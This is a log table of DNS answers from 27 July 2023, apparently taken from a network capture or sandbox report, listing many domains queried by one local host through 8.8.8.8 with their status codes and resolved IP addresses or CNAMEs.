                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.322992086 CEST8.8.8.8192.168.2.40x43b3No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.344647884 CEST8.8.8.8192.168.2.40xd895No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.344647884 CEST8.8.8.8192.168.2.40xd895No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.384879112 CEST8.8.8.8192.168.2.40x6cfbServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.482131958 CEST8.8.8.8192.168.2.40xb3c5No error (0)araax.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.482131958 CEST8.8.8.8192.168.2.40xb3c5No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.482131958 CEST8.8.8.8192.168.2.40xb3c5No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.482131958 CEST8.8.8.8192.168.2.40xb3c5No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.633052111 CEST8.8.8.8192.168.2.40xb77fNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.633052111 CEST8.8.8.8192.168.2.40xb77fNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.681833029 CEST8.8.8.8192.168.2.40xa2e2No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.714199066 CEST8.8.8.8192.168.2.40x84a0No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.727189064 CEST8.8.8.8192.168.2.40xf0eaNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.727189064 CEST8.8.8.8192.168.2.40xf0eaNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.770422935 CEST8.8.8.8192.168.2.40xa3cfServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.797497034 CEST8.8.8.8192.168.2.40x6e47No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.812906027 CEST8.8.8.8192.168.2.40x59a3No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.819628954 CEST8.8.8.8192.168.2.40xe921No error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.819628954 CEST8.8.8.8192.168.2.40xe921No error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.820820093 CEST8.8.8.8192.168.2.40x8d28No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.849147081 CEST8.8.8.8192.168.2.40xf26cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.984608889 CEST8.8.8.8192.168.2.40xf6a0Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.028152943 CEST8.8.8.8192.168.2.40xf27dNo error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.097122908 CEST8.8.8.8192.168.2.40x3c5Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.100663900 CEST8.8.8.8192.168.2.40x7b34No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.100663900 CEST8.8.8.8192.168.2.40x7b34No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.224519968 CEST8.8.8.8192.168.2.40x313cNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.247545004 CEST8.8.8.8192.168.2.40x8ce3No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.368570089 CEST8.8.8.8192.168.2.40x6cfbServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401437998 CEST8.8.8.8192.168.2.40xb4deNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401437998 CEST8.8.8.8192.168.2.40xb4deNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401437998 CEST8.8.8.8192.168.2.40xb4deNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401437998 CEST8.8.8.8192.168.2.40xb4deNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401932955 CEST8.8.8.8192.168.2.40x1b58No error (0)araax.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401932955 CEST8.8.8.8192.168.2.40x1b58No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401932955 CEST8.8.8.8192.168.2.40x1b58No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.401932955 CEST8.8.8.8192.168.2.40x1b58No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.462810040 CEST8.8.8.8192.168.2.40xfca7Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.482389927 CEST8.8.8.8192.168.2.40x3f88No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.504378080 CEST8.8.8.8192.168.2.40x27a4No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.522115946 CEST8.8.8.8192.168.2.40x8145No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.697062969 CEST8.8.8.8192.168.2.40x3457No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.719867945 CEST8.8.8.8192.168.2.40x4c8No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.742304087 CEST8.8.8.8192.168.2.40xb728Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.744441032 CEST8.8.8.8192.168.2.40xb661No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.750370979 CEST8.8.8.8192.168.2.40xed88No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.772747040 CEST8.8.8.8192.168.2.40xe531Name error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.780181885 CEST8.8.8.8192.168.2.40xa3cfServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.793905020 CEST8.8.8.8192.168.2.40x727Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.794708967 CEST8.8.8.8192.168.2.40x4c4dName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.808521032 CEST8.8.8.8192.168.2.40x5354Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.912518978 CEST8.8.8.8192.168.2.40x3084Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:35.977714062 CEST8.8.8.8192.168.2.40x7902Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.015399933 CEST8.8.8.8192.168.2.40x2172Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.068396091 CEST8.8.8.8192.168.2.40xf500No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.068396091 CEST8.8.8.8192.168.2.40xf500No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.068396091 CEST8.8.8.8192.168.2.40xf500No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.088207960 CEST8.8.8.8192.168.2.40x363No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.108836889 CEST8.8.8.8192.168.2.40x8ea7Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.157798052 CEST8.8.8.8192.168.2.40x6cffNo error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.179775000 CEST8.8.8.8192.168.2.40xfca7Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.211973906 CEST8.8.8.8192.168.2.40x7127No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.241192102 CEST8.8.8.8192.168.2.40xe5fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.433871984 CEST8.8.8.8192.168.2.40x41a1No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.433871984 CEST8.8.8.8192.168.2.40x41a1No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.433871984 CEST8.8.8.8192.168.2.40x41a1No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.433871984 CEST8.8.8.8192.168.2.40x41a1No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.467268944 CEST8.8.8.8192.168.2.40x723eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.492135048 CEST8.8.8.8192.168.2.40x2c5aNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.535824060 CEST8.8.8.8192.168.2.40x3afdNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.552500010 CEST8.8.8.8192.168.2.40x2e30No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.554678917 CEST8.8.8.8192.168.2.40x84d8No error (0)rkengg.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.554678917 CEST8.8.8.8192.168.2.40x84d8No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.554678917 CEST8.8.8.8192.168.2.40x84d8No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.554678917 CEST8.8.8.8192.168.2.40x84d8No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.571635008 CEST8.8.8.8192.168.2.40xdb8dNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.571635008 CEST8.8.8.8192.168.2.40xdb8dNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.571635008 CEST8.8.8.8192.168.2.40xdb8dNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.580843925 CEST8.8.8.8192.168.2.40xc5dNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.584613085 CEST8.8.8.8192.168.2.40x2c8fNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.619708061 CEST8.8.8.8192.168.2.40x2007Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.690994978 CEST8.8.8.8192.168.2.40xc404No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.690994978 CEST8.8.8.8192.168.2.40xc404No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.690994978 CEST8.8.8.8192.168.2.40xc404No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.732933998 CEST8.8.8.8192.168.2.40x96f1No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.786478996 CEST8.8.8.8192.168.2.40x96a1No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.887654066 CEST8.8.8.8192.168.2.40x5f2bServer failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:36.935758114 CEST8.8.8.8192.168.2.40x81cfNo error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.032471895 CEST8.8.8.8192.168.2.40x21e3No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.066026926 CEST8.8.8.8192.168.2.40x89d9No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.071657896 CEST8.8.8.8192.168.2.40x6c81No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.071657896 CEST8.8.8.8192.168.2.40x6c81No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.084022999 CEST8.8.8.8192.168.2.40xaf0dNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.230204105 CEST8.8.8.8192.168.2.40xad0fNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.312922955 CEST8.8.8.8192.168.2.40xe5fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.338080883 CEST8.8.8.8192.168.2.40x2b03No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.338080883 CEST8.8.8.8192.168.2.40x2b03No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.338080883 CEST8.8.8.8192.168.2.40x2b03No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.351522923 CEST8.8.8.8192.168.2.40xd9a4Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.362951040 CEST8.8.8.8192.168.2.40xab88No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.387377977 CEST8.8.8.8192.168.2.40x8543No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.387538910 CEST8.8.8.8192.168.2.40xe4c6No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.387538910 CEST8.8.8.8192.168.2.40xe4c6No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.387538910 CEST8.8.8.8192.168.2.40xe4c6No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.387538910 CEST8.8.8.8192.168.2.40xe4c6No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.413809061 CEST8.8.8.8192.168.2.40x96ccNo error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.413809061 CEST8.8.8.8192.168.2.40x96ccNo error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.413809061 CEST8.8.8.8192.168.2.40x96ccNo error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.413809061 CEST8.8.8.8192.168.2.40x96ccNo error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.467952013 CEST8.8.8.8192.168.2.40x723eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.553030968 CEST8.8.8.8192.168.2.40x64f2No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.553030968 CEST8.8.8.8192.168.2.40x64f2No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.633708000 CEST8.8.8.8192.168.2.40xc252No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.720531940 CEST8.8.8.8192.168.2.40x854fNo error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.720531940 CEST8.8.8.8192.168.2.40x854fNo error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.778669119 CEST8.8.8.8192.168.2.40xd636No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:37.911725044 CEST8.8.8.8192.168.2.40x5754No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.157255888 CEST8.8.8.8192.168.2.40xfee7No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.167665958 CEST8.8.8.8192.168.2.40x736fNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.167665958 CEST8.8.8.8192.168.2.40x736fNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.167665958 CEST8.8.8.8192.168.2.40x736fNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.425964117 CEST8.8.8.8192.168.2.40x77d9No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.463440895 CEST8.8.8.8192.168.2.40xe138Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.483257055 CEST8.8.8.8192.168.2.40x723eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.507548094 CEST8.8.8.8192.168.2.40xdf95No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.507548094 CEST8.8.8.8192.168.2.40xdf95No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.511512995 CEST8.8.8.8192.168.2.40x92f8No error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.527009964 CEST8.8.8.8192.168.2.40x33d1Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.546372890 CEST8.8.8.8192.168.2.40x29e3No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.562104940 CEST8.8.8.8192.168.2.40xc64Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.567362070 CEST8.8.8.8192.168.2.40x1126No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:38.963260889 CEST8.8.8.8192.168.2.40x6b62No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.001115084 CEST8.8.8.8192.168.2.40xaf86No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.036945105 CEST8.8.8.8192.168.2.40x904bNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.036945105 CEST8.8.8.8192.168.2.40x904bNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.065512896 CEST8.8.8.8192.168.2.40x6f5bNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.124346972 CEST8.8.8.8192.168.2.40x185bNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.132379055 CEST8.8.8.8192.168.2.40x32c1Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.163090944 CEST8.8.8.8192.168.2.40xc9a9Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.215183973 CEST8.8.8.8192.168.2.40x7fe8No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.215183973 CEST8.8.8.8192.168.2.40x7fe8No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.293500900 CEST8.8.8.8192.168.2.40xbd73No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.293500900 CEST8.8.8.8192.168.2.40xbd73No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.293500900 CEST8.8.8.8192.168.2.40xbd73No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.301495075 CEST8.8.8.8192.168.2.40xaf4cNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.301986933 CEST8.8.8.8192.168.2.40x2d07No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.301986933 CEST8.8.8.8192.168.2.40x2d07No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.301986933 CEST8.8.8.8192.168.2.40x2d07No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.392829895 CEST8.8.8.8192.168.2.40x3e92No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.392829895 CEST8.8.8.8192.168.2.40x3e92No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.538247108 CEST8.8.8.8192.168.2.40x733eNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.573226929 CEST8.8.8.8192.168.2.40x2b73No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.622901917 CEST8.8.8.8192.168.2.40x5982No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.688951015 CEST8.8.8.8192.168.2.40xdd02No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.775496006 CEST8.8.8.8192.168.2.40xb085Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.813047886 CEST8.8.8.8192.168.2.40x8896No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.813047886 CEST8.8.8.8192.168.2.40x8896No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.813047886 CEST8.8.8.8192.168.2.40x8896No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.813047886 CEST8.8.8.8192.168.2.40x8896No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.814178944 CEST8.8.8.8192.168.2.40x530fNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:39.814178944 CEST8.8.8.8192.168.2.40x530fNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
